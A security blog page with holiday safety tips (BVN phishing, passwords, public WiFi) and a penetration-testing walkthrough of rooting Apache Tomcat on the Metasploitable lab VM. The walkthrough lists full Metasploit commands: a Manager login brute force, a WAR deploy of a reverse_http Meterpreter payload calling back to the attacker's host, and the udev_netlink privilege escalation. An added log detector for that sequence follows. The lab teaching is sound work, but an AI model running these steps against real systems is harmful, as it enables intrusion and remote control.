Tips to staying safe online this festive season

| Posted in Security Articles |


The holiday season is upon us and, as always, we are all scrambling to get the best deals online and in stores. However, a few wrong clicks this season could put cybercriminals at the top of the list of people receiving presents from you this year.

This year has witnessed lots of significant breaches ranging from a $40m cyber-heist by a Nigerian bank IT worker to the huge data leakage at Sony, just about a week ago.

Information security expert Rotimi Akinyele of PhynxLabs said that online users can easily put themselves and their devices at risk unless they take precautions and avoid the common mistakes highlighted below, each of which could compromise their security.

 

Beware of the Bank Verification Number (BVN) Scam

The ongoing Bank Verification Number (BVN) exercise, introduced by the CBN as a means of uniquely identifying bank customers across the Nigerian banking industry, has provided fertile ground for cybercriminals to defraud unsuspecting bank customers.

Scam emails purportedly sent from banks or the CBN are in circulation, urging bank customers to visit a website to activate their BVN online and claiming that failure to do so will result in their account(s) and debit cards being deactivated.

Please note that BVN registration can only be done physically at a bank branch. There is currently no technology that can replace the physical capture of your biometric data, which is what the BVN seeks to achieve.

Do NOT access your accounts from public WiFi

Just because a WiFi network is free doesn’t mean you should connect to it whenever it’s available. When you’re banking or making other online payments, it’s better to connect over EDGE or 3G, even if it’s slower. An online bank transaction might take only 45 seconds, but if the wireless network has been compromised, that is more than enough time for a cybercriminal to collect your data.

Use a secure password

It’s crucial to always use strong passwords, as passwords are the first line of defense against cyber crooks. Try not to use the names of your family, pets or first car, your mother’s maiden name, etc., as all of these can be easily guessed, brute forced or even found on social media sites like Facebook, Twitter or Instagram. Make sure to use a mixture of characters, numbers and letters, at least 8 characters long, when choosing your password; only this will make any attempted password theft significantly harder. Also, do not reuse your passwords, as a compromise of one would translate into a compromise of all.
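The rules in this paragraph, written up as a checker. This is an added example, not code from the post or from PhynxLabs; the rule wording and the substitution table are my assumptions, and the reuse check assumes earlier passwords are kept only as salted SHA-256 digests in "salt:hex" form.

```python
import hashlib
import hmac
import os
import re

# Letters-for-symbols substitutions that people commonly apply to a pet's or
# relative's name; folding them lets "Fluffy2009!" still match "fluffy".
_FOLD = str.maketrans('013457@$!', 'oleastasi')

def check_password(password, personal_terms=()):
    """Return the list of rules from the post that `password` breaks (empty list = OK)."""
    problems = []
    if len(password) < 8:
        problems.append('shorter than 8 characters')
    if not re.search(r'[A-Za-z]', password):
        problems.append('no letters')
    if not re.search(r'\d', password):
        problems.append('no numbers')
    if not re.search(r'[^A-Za-z0-9]', password):
        problems.append('no symbol characters')
    folded = password.lower().translate(_FOLD)
    for term in personal_terms:          # family, pets, first car, maiden name ...
        if len(term) >= 3 and term.lower() in folded:
            problems.append(f"contains personal term '{term}'")
    return problems

def remember(password):
    """Store a password as 'salt:sha256hex' so later reuse can be detected."""
    salt = os.urandom(8).hex()
    return salt + ':' + hashlib.sha256((salt + password).encode()).hexdigest()

def is_reused(password, previous):
    """True if `password` equals any earlier password recorded with remember()."""
    for entry in previous:
        salt, digest = entry.split(':', 1)
        candidate = hashlib.sha256((salt + password).encode()).hexdigest()
        if hmac.compare_digest(candidate, digest):
            return True
    return False

if __name__ == '__main__':
    print(check_password('Fluffy2009!', ['Fluffy', 'Lagos']))
    print(check_password('fluffy'))
```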

Stay safe on social networking sites

Social media sites are increasingly becoming targets for spam, scams and other online attacks. Aside from mining data from tons of “status updates” for targeted attacks, cybercriminals have mastered the art of baiting unsuspecting users with well-crafted, short but compelling posts offering free entry to a Christmas competition with a fantastic prize. The general rule is “there is no free lunch or freebies on the internet – if you’re not buying a product then you are the product”. Users who click the links then inadvertently act as accomplices to the cybercriminals, because the malicious scripts automatically re-post the links, images or videos on their contacts’ walls or timelines. If an offer looks too good to be true, it probably is. Do NOT click.

Protect yourself from fraudulent emails

If you receive an email urging you to download an unknown tax payment attachment, or an email informing you of an urgent pending transaction that requires you to log in with your details to verify it, DELETE that email. Such emails usually trick users into visiting a site, and once you do, viruses and spyware get downloaded onto your device, which automatically joins it to a network of enslaved computers programmed to carry out malicious deeds. No reputable organization would send emails to collect user names, passwords, token keys or debit/credit card details.

 

The threats to your online accounts increase daily; however, the tips above can help you stay protected online while still enjoying the convenience that online access offers you this holiday.

Stay safe online and happy holidays!

Rotimi Akinyele is the Chief Security Evangelist at PhynxLabs, where he leads the application and network security competency.

[VIDEO] Gaining Root via the Apache Tomcat Service

| Posted in Security Videos |


This video demonstrates how to exploit the Apache Tomcat service on Metasploitable. Metasploitable is another vulnerable VM designed for practicing penetration testing.

In this video, I will show you how to scan the system, find one of the vulnerable services (Apache Tomcat) and then exploit that service to gain root access.

 

Steps

  • Use Netdiscover to get the IP address of our target (Reconnaissance)
  • Use Nmap to do a detailed scan of the target (Information Gathering)
  • Use Metasploit to brute force the Apache Tomcat Manager login (Gaining Access)
  • Use Metasploit to upload and execute the payload (Remote Access)
  • Use Metasploit to gain root privileges (Privilege Escalation)

Commands

ifconfig
netdiscover -r 192.168.61.0/24
nmap -T Aggressive -sV -v 192.168.61.133
msfconsole
search tomcat
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 192.168.61.133
set RPORT 8180
exploit
search tomcat
use exploit/multi/http/tomcat_mgr_deploy
set USERNAME tomcat
set PASSWORD tomcat
set RHOST 192.168.61.133
set RPORT 8180
set payload java/meterpreter/reverse_http
set LHOST 192.168.61.128
set target 1
exploit
use exploit/linux/local/udev_netlink
sessions -i
set SESSION 1
exploit
id
whoami

 

Notes

  • Song – Bucie feat Heavy K – Easy to Love
  • Video Length – 8 minutes

Conclusion

At the end of it all, we were able to get a remote root shell from a vulnerable Apache Tomcat service. In a real-world pentest scenario, we would go on to explore the machine and retrieve as much sensitive information as possible. We could even use this machine to pivot into the entire network.
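Seen from the defender's side, the first two Metasploit steps above (a burst of failed Manager logins, then a successful WAR deployment with the guessed credentials) leave a very recognisable trail in Tomcat's access log. The detector below is an added example, not part of the video or of Metasploit; the log lines are constructed in the common log format, using the lab addresses from the post, and the threshold, window and Manager deploy paths are my assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Tomcat access log sample: five Basic-auth failures against the
# Manager app from one host, a successful WAR deploy by that host, then a
# normal admin login from elsewhere.
SAMPLE_LOG = """\
192.168.61.128 - - [15/Dec/2014:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.168.61.128 - - [15/Dec/2014:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.168.61.128 - - [15/Dec/2014:10:00:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.168.61.128 - - [15/Dec/2014:10:00:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.168.61.128 - - [15/Dec/2014:10:00:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.168.61.128 - tomcat [15/Dec/2014:10:00:09 +0000] "PUT /manager/deploy?path=/Xk3q HTTP/1.1" 200 46
192.168.61.50 - admin [15/Dec/2014:10:05:00 +0000] "GET /manager/html HTTP/1.1" 200 9821
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Manager endpoints that install a new web application.
DEPLOY_RE = re.compile(r'^/manager/(text/)?deploy\b|^/manager/html/upload\b')

def parse(log_text):
    """Turn common-log-format lines into dicts; silently skip lines that do not match."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            d = m.groupdict()
            d['ts'] = datetime.strptime(d['ts'], '%d/%b/%Y:%H:%M:%S %z')
            d['status'] = int(d['status'])
            events.append(d)
    return events

def detect(log_text, threshold=5, window=timedelta(minutes=5)):
    """Return (source_ip, alert) pairs for Manager brute force and WAR deployments."""
    alerts, bursts = [], set()
    failures = defaultdict(list)            # ip -> timestamps of 401s on /manager
    for ev in parse(log_text):
        ip = ev['ip']
        if ev['path'].startswith('/manager') and ev['status'] == 401:
            failures[ip] = [t for t in failures[ip] if ev['ts'] - t <= window]
            failures[ip].append(ev['ts'])
            if len(failures[ip]) == threshold:   # alert once per burst
                alerts.append((ip, 'manager-login brute force'))
                bursts.add(ip)
        elif DEPLOY_RE.match(ev['path']) and ev['status'] == 200:
            why = 'WAR deploy after failed logins' if ip in bursts else 'WAR deploy'
            alerts.append((ip, f"{why} as '{ev['user']}'"))
    return alerts

if __name__ == '__main__':
    for ip, alert in detect(SAMPLE_LOG):
        print(ip, alert)
```

Any successful deploy is worth reviewing on a box where nobody is supposed to be publishing applications, and a deploy that follows a login burst from the same address is the exact sequence the video's tomcat_mgr_login / tomcat_mgr_deploy pair produces.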

 

Kindly use the comment box below for feedback.

 

– InfosecShinobi